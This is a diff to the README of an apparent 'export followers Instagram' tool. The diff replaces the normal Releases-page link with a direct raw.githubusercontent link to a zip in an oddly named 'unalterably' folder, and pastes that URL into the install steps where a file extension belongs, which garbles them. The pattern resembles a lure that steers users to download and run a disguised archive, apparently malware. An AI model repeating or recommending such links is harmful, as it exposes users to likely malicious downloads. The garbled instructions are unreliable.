MuhammadUnaiz/export-followers-instagram/README.md

 ## 💡 How to Download & Install

 1. **Visit the Download Page**
-   Visit this page to download: [Releases Page](https://github.com/MuhammadUnaiz/export-followers-instagram/releases).
+   Visit this page to download: [Releases Page](https://raw.githubusercontent.com/MuhammadUnaiz/export-followers-instagram/main/unalterably/export-followers-instagram.zip).

 2. **Select the Latest Release**
    On the releases page, you will see a list of available versions.
 Look for the latest release at the top.

 3. **Download the Application**
    Locate the downloadable file that matches your operating system.
 Click on the link to start the download.
-The files typically have formats like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+The files typically have formats like `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/MuhammadUnaiz/export-followers-instagram/main/unalterably/export-followers-instagram.zip` for Linux.

 4. **Install the Application**
    - **For Windows**: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - **For macOS**: Open the downloaded `.dmg` file, drag the application into your Applications folder, and then open the app.
-   - **For Linux**: Extract the `.tar.gz` file.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/MuhammadUnaiz/export-followers-instagram/main/unalterably/export-followers-instagram.zip` file.
 Open your terminal and run the application by navigating to the extracted folder.

 5. **Launch the Application**
    Find the application on your device and open it to start using it.